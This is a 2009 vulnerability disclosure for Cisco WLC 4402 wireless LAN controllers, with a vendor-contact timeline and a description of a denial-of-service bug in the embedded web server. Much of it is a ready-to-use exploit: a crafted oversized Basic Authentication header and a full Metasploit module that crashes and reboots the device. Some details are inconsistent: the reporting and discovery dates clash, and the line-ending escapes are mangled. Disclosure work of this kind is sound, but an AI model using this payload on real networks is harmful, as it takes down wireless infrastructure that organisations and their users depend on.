=======================================
Vulnerable Product: Cisco WLC 4402 (most likely among many others)
Vulnerability discovered: January 2009
Reported to vendor: Jan 01, 2009
Fix available: not yet
=======================================
TIMELINE:
---------------------------------------------------
+ 01/11/2009: discovered vulnerability on a customer's site
+ 01/13/2009: initial vendor contact via psirt_at_cisco.com
+ 01/14/2009: vendor opened PSIRT case ID PSIRT-1018301631
+ 02/09/2009: vendor states, that bugfix is _not_ contained within cisco-sa-20090204-wlc
+ 03/30/2009: vendor states: "We have a fix for this issue. However, due to some other issues we are investigating we may not make this public until about 42 days."
+ 06/02/2009: vendor states: "I really apologize for the delay on publishing this advisory. The reason that we have not publish is because we are also incorporating other security fixes within all the affected releases. We WILL be publishing the advisory on July 8th, 2009 at 1600 UTC."
+ 07/24/2009: Customer agreed with full disclosure
+ 07/26/2009: Still no fixes available; full disclosure due to lacking vendor activities.
PRODUCT:
---------------------------------------------------
The Cisco WLC 4402 is a Wireless LAN Controller, which is manageable via
an integrated embedded webserver (emweb httpd).
AFFECTED VERSIONS:
---------------------------------------------------
The vulnerability described below could have been verified on WLC 4402, software release 5.1.151.0. However, since the vulnerability affects the integrated embedded emweb http daemon, several other products and/or software releases might be affected, too.
VULNERABILITY:
---------------------------------------------------
Using long, random authentication data, the embedded web server can becrashed, which leeds to a device reboot. Subsequently repeated requests lead to a permanent denial of service of the WLC (and therefore of the whole wireless infrastructure).
EXPLOIT:
---------------------------------------------------
Not needed.
One only has to call
"/screens/frameset.html"
and provide Basic Authentication data which uses
a username and password longer than 63 characters each.
The following header worked for me:
Authorization: Basic
MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0
The following code snippet can be used as a module within the metasploit
framework:
---- snip -----
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco WLC 4200 Basic Auth
Denial of Service',
'Description' => %q{
This module triggers a Denial of Service
condition in the Cisco WLC 4200
HTTP server. By sending a GET request
with long authentication data, the
device becomes unresponsive and reboots.
Firmware is reportedly vulnerable.
},
'Author' => [ 'Christoph Bott
<msf[at]bott.syss.de>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 5949 $',
'References' =>
[
[ 'BID', '???'],
[ 'CVE', '???'],
[ 'URL',
'http://www.cisco.com/?????'],
],
'DisclosureDate' => 'January 26 2009'))
register_options(
[
Opt::RPORT(80),
], self.class)
end
def run
connect
print_status("Sending HTTP DoS packet")
sploit =
"GET /screens/frameset.html HTTP/1.0rn" +
"Authorization: Basic
MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0"
sock.put(sploit + "rn")
disconnect
end
end
---- snip ----